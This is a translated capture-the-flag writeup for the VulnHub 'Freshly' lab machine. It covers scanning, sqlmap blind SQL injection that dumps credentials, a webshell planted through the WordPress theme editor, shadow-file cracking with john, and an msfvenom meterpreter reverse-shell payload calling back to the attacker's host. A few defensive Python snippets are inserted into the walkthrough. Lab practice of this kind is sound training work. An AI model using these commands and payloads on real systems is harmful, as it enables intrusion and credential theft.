
[原创]VulnHub-Freshly Writeup

2019-4-20 01:07 4600

Introduction

VulnHub is an overseas practice-range platform whose environments are distributed as virtual machine images, which makes it well suited to penetration-testing practice; site: https://www.vulnhub.com/. The target environment this time is Freshly.

Objective

The goal of this challenge is to break into the machine via the web and find the secret hidden in a sensitive file. If you can find the secret, send me an email for verification. :)
There are a couple of different ways that you can go with this one. Good luck!
Simply download and import the OVA file into virtualbox!

 

VulnHub note: You may have issues when importing to VMware. If this is the case. extract the HDD from the OVA file (using something like 7zip), and attach to a new VM. Please see the following guide: https://jkad.github.io/blog/2015/04/12/how-to-import-the-top-hat-sec-vms-into-vmware/.

Information gathering

Port scanning

Quick scan:

nmap -T4 -F 192.168.1.104

 

Result:

Nmap scan report for 192.168.1.104
Host is up (0.00018s latency).
Not shown: 97 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
8080/tcp open  http-proxy
MAC Address: 08:00:27:D4:BC:A6 (Oracle VirtualBox virtual NIC)

Port 80 serves only an image:

 

The main site is found on port 8080: http://192.168.1.104:8080/wordpress/

It is a WordPress site.

wpscan scan

Scan the WordPress installation:

wpscan --url http://192.168.1.104:8080/wordpress/

 

Result:

...
[+] WordPress version 4.1.26 identified (Latest, released on 2019-03-13).
...
[+] WordPress theme in use: twentythirteen
...
| Version: 1.4 (80% confidence)

[i] Plugin(s) Identified:

[+] all-in-one-seo-pack
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/all-in-one-seo-pack/
 | Last Updated: 2019-02-20T19:20:00.000Z
 | [!] The version is out of date, the latest version is 2.12
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 5 vulnerabilities identified:
 |
 | [!] Title: All in One SEO Pack <= 2.2.5.1 - Information Disclosure
 |     Fixed in: 2.2.6
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7881
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0902
 |      - http://jvn.jp/en/jp/JVN75615300/index.html
 |      - http://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |
 | [!] Title: All in One SEO Pack <= 2.2.6.1 - Cross-Site Scripting (XSS)
 |     Fixed in: 2.2.6.2
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7916
 |      - https://blog.sucuri.net/2015/04/security-advisory-xss-vulnerability-affecting-multiple-wordpress-plugins.html
 |
 | [!] Title: All in One SEO Pack <= 2.3.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.3.7
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8538
 |      - http://seclists.org/fulldisclosure/2016/Jul/23
 |      - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |      - https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
 |      - https://wptavern.com/all-in-one-seo-2-3-7-patches-persistent-xss-vulnerability
 |      - https://www.wordfence.com/blog/2016/07/xss-vulnerability-all-in-one-seo-pack-plugin/
 |
 | [!] Title: All in One SEO Pack <= 2.3.7 -  Unauthenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.3.8
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8558
 |      - https://www.wordfence.com/blog/2016/07/new-xss-vulnerability-all-in-one-seo-pack/
 |      - https://semperfiwebdesign.com/blog/all-in-one-seo-pack/all-in-one-seo-pack-release-history/
 |
 | [!] Title: All in One SEO Pack <= 2.9.1.1 - Authenticated Stored Cross-Site Scripting (XSS)
 |     Fixed in: 2.10
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9159
 |      - https://www.ripstech.com/php-security-calendar-2018/#day-4
 |      - https://wordpress.org/support/topic/a-critical-vulnerability-has-been-detected-in-this-plugin/
 |      - https://semperfiwebdesign.com/all-in-one-seo-pack-release-history/
 |
 | Version: 2.2.5.1 (60% confidence)
 | Detected By: Comment (Passive Detection)
 |  - http://192.168.1.104:8080/wordpress/, Match: 'All in One SEO Pack 2.2.5.1 by'

[+] cart66-lite
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/
 | Last Updated: 2016-01-27T21:11:00.000Z
 | [!] The version is out of date, the latest version is 1.5.8
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: Cart66 Lite <= 1.5.3 - SQL Injection
 |     Fixed in: 1.5.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7737
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9442
 |      - https://research.g0blin.co.uk/cve-2014-9442/
 |
 | [!] Title: Cart66 Lite 1.5.4 - XSS
 |     Fixed in: 1.5.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8014
 |      - http://packetstormsecurity.com/files/130307/
 |
 | Version: 1.5.3 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/cart66-lite/readme.txt

[+] contact-form-7
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/
 | Last Updated: 2018-12-18T18:05:00.000Z
 | [!] The version is out of date, the latest version is 5.1.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: Contact Form 7 <= 5.0.3 - register_post_type() Privilege Escalation
 |     Fixed in: 5.0.4
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/9127
 |      - https://contactform7.com/2018/09/04/contact-form-7-504/
 |      - https://plugins.trac.wordpress.org/changeset/1935726/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934594/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934343/contact-form-7
 |      - https://plugins.trac.wordpress.org/changeset/1934327/contact-form-7
 |      - https://www.ripstech.com/php-security-calendar-2018/#day-18
 |
 | Version: 4.1 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/contact-form-7/readme.txt

[+] proplayer
 | Location: http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: ProPlayer 4.7.9.1 - SQL Injection
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6912
 |      - https://www.exploit-db.com/exploits/25605/
 |
 | Version: 4.7.9.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.1.104:8080/wordpress/wp-content/plugins/proplayer/readme.txt

The scan revealed the WordPress version, the installed plugins and their known vulnerabilities. The plugins listed above with SQL injection vulnerabilities were tested, but none of the attempts succeeded.

 

Enumerate user names:

wpscan --url http://192.168.1.104:8080/wordpress/ --enumerate u

Result:

[i] User(s) Identified:

[+] admin
 | Detected By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Aggressive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Password attack:

wpscan --url http://192.168.1.104:8080/wordpress --usernames admin --password-attack wp-login -P word1000.txt

No password was recovered.

Directory scanning

A directory scan of http://192.168.1.104/ with 御剑 (Yujian) found phpmyadmin and login.php.

Testing showed that phpmyadmin could not be logged into.

Exploitation

SQL injection

Against login.php:

Entering admin' or sleep(10)# makes the page response pause noticeably, so an injection exists. Use sqlmap:

sqlmap.py -u "http://192.168.1.104/login.php" --forms

 

No injection point was found, so raise the level:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --level=5 --risk=3

 

The injection point is found:

sqlmap identified the following injection point(s) with a total of 6020 HTTP(s) requests:
---
Parameter: user (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: user=admin'||(SELECT 'CIgz' FROM DUAL WHERE 2964=2964 AND SLEEP(5))||'&password=uUbb&s=Submit
---
do you want to exploit this SQL injection? [Y/n] y
[23:21:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.12
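The root cause, as an added illustration that is not code from the writeup: a login query assembled by string concatenation hands the payload above to the SQL parser, while a parameterized query treats it as a literal. It uses an in-memory SQLite table in place of the target's MySQL database (an assumption; SQLite has no sleep(), so the unsafe path surfaces as a parser error rather than a delay).

```python
import sqlite3


def make_db():
    """Constructed stand-in for the target's 'users' table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'SuperSecretPassword')")
    return db


def build_query_unsafe(user, password):
    # The bug class behind login.php: untrusted input spliced into SQL text.
    return f"SELECT username FROM users WHERE username='{user}' AND password='{password}'"


def login_unsafe(db, user, password):
    # Whatever the user typed is parsed as SQL; the quote and '#' change the statement.
    row = db.execute(build_query_unsafe(user, password)).fetchone()
    return row[0] if row else None


def login_safe(db, user, password):
    # Placeholders bind the values; quote and comment characters stay data, not syntax.
    row = db.execute(
        "SELECT username FROM users WHERE username=? AND password=?", (user, password)
    ).fetchone()
    return row[0] if row else None


def injected_input_hits_parser(db, user, password):
    """True when the input reached the SQL parser as syntax (only possible on the unsafe path)."""
    try:
        login_unsafe(db, user, password)
        return False
    except sqlite3.OperationalError:
        return True
```

The same probe against login_safe never raises, because the bound value is never parsed.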

Run the following commands in turn:

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dbs

sqlmap.py -u "http://192.168.1.104/login.php" --forms --tables -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --columns -T "users" -D "wordpress8080"

sqlmap.py -u "http://192.168.1.104/login.php" --forms --dump -C "username,password" -T "users" -D "wordpress8080"

 

This yields the WordPress account and password:

Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

Getting a shell from the WordPress backend

After logging into the WordPress backend, go to Appearance - Editor, pick any PHP file and write a one-line webshell into it, then connect with 菜刀 (China Chopper):
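A defender-side counterpart, added here and not part of the writeup: every theme file an administrator can edit from the dashboard is also a file an integrity check can baseline, so a hash baseline of the theme directory shows exactly which file was changed or dropped. The directory and file names are constructed.

```python
import hashlib
import os
import tempfile


def file_hashes(root):
    """Map each file path (relative to root) to its SHA-256 hex digest."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                result[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return result


def diff_baseline(baseline, current):
    """Report files added, removed or modified since the baseline was taken."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: a theme directory is baselined, then edited from the dashboard."""
    with tempfile.TemporaryDirectory() as theme:
        for name, body in (("header.php", "<?php get_header(); ?>\n"), ("style.css", "body{}\n")):
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(body)
        baseline = file_hashes(theme)
        # What a theme-editor compromise leaves behind: an existing PHP file changes ...
        with open(os.path.join(theme, "header.php"), "a") as fh:
            fh.write("<?php /* appended by someone holding admin access */ ?>\n")
        # ... or a new PHP file appears that the baseline never knew about.
        with open(os.path.join(theme, "dropped.php"), "w") as fh:
            fh.write("<?php ?>\n")
        return diff_baseline(baseline, file_hashes(theme))
```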


Open a virtual terminal in 菜刀:

[/etc/]$ id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

The current user is not root.
View /etc/passwd:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
user:x:1000:1000:user,,,:/home/user:/bin/bash
mysql:x:103:111:MySQL Server,,,:/nonexistent:/bin/false
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"

The file contains a hint, presumably meaning that a password needs to be cracked.
Download /etc/passwd and /etc/shadow, and in Kali run:

unshadow passwd shadow > hashes.txt
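As an added defender-side check (not from the writeup), the merge unshadow performs, done by hand on a constructed passwd/shadow pair built from the listing above (the shadow file and its hashes are placeholders), plus a sanity pass over the file: it flags the two comment lines, since a valid passwd file holds only 7-field records, and lists which accounts both have a real password hash and an interactive shell, which is exactly where a reused WordPress password matters.

```python
# Constructed sample: four lines taken from the /etc/passwd listing above plus the two
# comment lines planted in it; the shadow file is made up, with placeholder hashes.
PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user,,,:/home/user:/bin/bash
candycane:x:1001:1001::/home/candycane:
# YOU STOLE MY SECRET FILE!
# SECRET = "NOBODY EVER GOES IN, AND NOBODY EVER COMES OUT!"
"""
SHADOW = """root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH1:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
user:$6$PLACEHOLDERSALT$PLACEHOLDERHASH2:18000:0:99999:7:::
candycane:!:18000:0:99999:7:::
"""
FIELDS = ("name", "pw", "uid", "gid", "gecos", "home", "shell")
NO_LOGIN = {"/usr/sbin/nologin", "/bin/false", ""}  # shells that never give a session


def parse_passwd(text):
    """Split passwd into valid 7-field records and lines that are not records at all."""
    entries, rejected = [], []
    for line in text.splitlines():
        fields = line.split(":")
        if line.startswith("#") or len(fields) != len(FIELDS):
            rejected.append(line)  # passwd has no comment syntax; anything odd is noise
        else:
            entries.append(dict(zip(FIELDS, fields)))
    return entries, rejected


def shadow_hashes(text):
    """Map user name to the hash field of each shadow line."""
    return {l.split(":")[0]: l.split(":")[1] for l in text.splitlines() if ":" in l}


def unshadow(passwd_text, shadow_text):
    """Same merge as unshadow(8): the 'x' placeholder is replaced by the shadow hash."""
    hashes = shadow_hashes(shadow_text)
    entries, _ = parse_passwd(passwd_text)
    return [":".join([e["name"], hashes.get(e["name"], e["pw"])] + [e[f] for f in FIELDS[2:]])
            for e in entries]


def exposed_accounts(passwd_text, shadow_text):
    """Names with a real hash ('$...') and an interactive shell: rotate these on any reuse."""
    hashes = shadow_hashes(shadow_text)
    entries, _ = parse_passwd(passwd_text)
    return [e["name"] for e in entries
            if hashes.get(e["name"], "").startswith("$") and e["shell"] not in NO_LOGIN]
```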

 

Add SuperSecretPassword to /usr/share/john/password.lst as well, then:

john hashes.txt

 


The root password turns out to be SuperSecretPassword.

Privilege escalation

Generate a reverse meterpreter payload in msf:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.106 lport=5555 -f raw > frenshly.php

Upload frenshly.php to the target with 菜刀, then set up the msf listener. Once the reverse meterpreter session arrives, enter the shell command to get a shell console. Entering "su - root" fails with a message that it must be run from a terminal, so run python -c 'import pty;pty.spawn("/bin/bash")' to get a terminal and complete the privilege escalation, as follows:

meterpreter > sysinfo
Computer    : Freshly
OS          : Linux Freshly 3.13.0-45-generic #74-Ubuntu SMP Tue Jan 13 19:37:48 UTC 2015 i686
Meterpreter : php/linux
meterpreter > getuid
Server username: daemon (1)
meterpreter > shell
Process 1384 created.
Channel 0 created.
su - root
su: must be run from a terminal
python -c 'import pty;pty.spawn("/bin/bash")'
tythirteen$ ^[[C^[[C^[[C^[[C^[[C1-0/apps/wordpress/htdocs/wp-content/themes/twent

tythirteen$ su - root                                                            
su - root
Password: SuperSecretPassword

root@Freshly:~# id
id
uid=0(root) gid=0(root) groups=0(root)

Summary

  • Information gathering is essential; the target's ports, directories and so on must be mapped thoroughly
  • Raising sqlmap's level and risk parameters makes the testing more complete
  • Be familiar with the Kali tooling: sqlmap, wpscan, john and so on

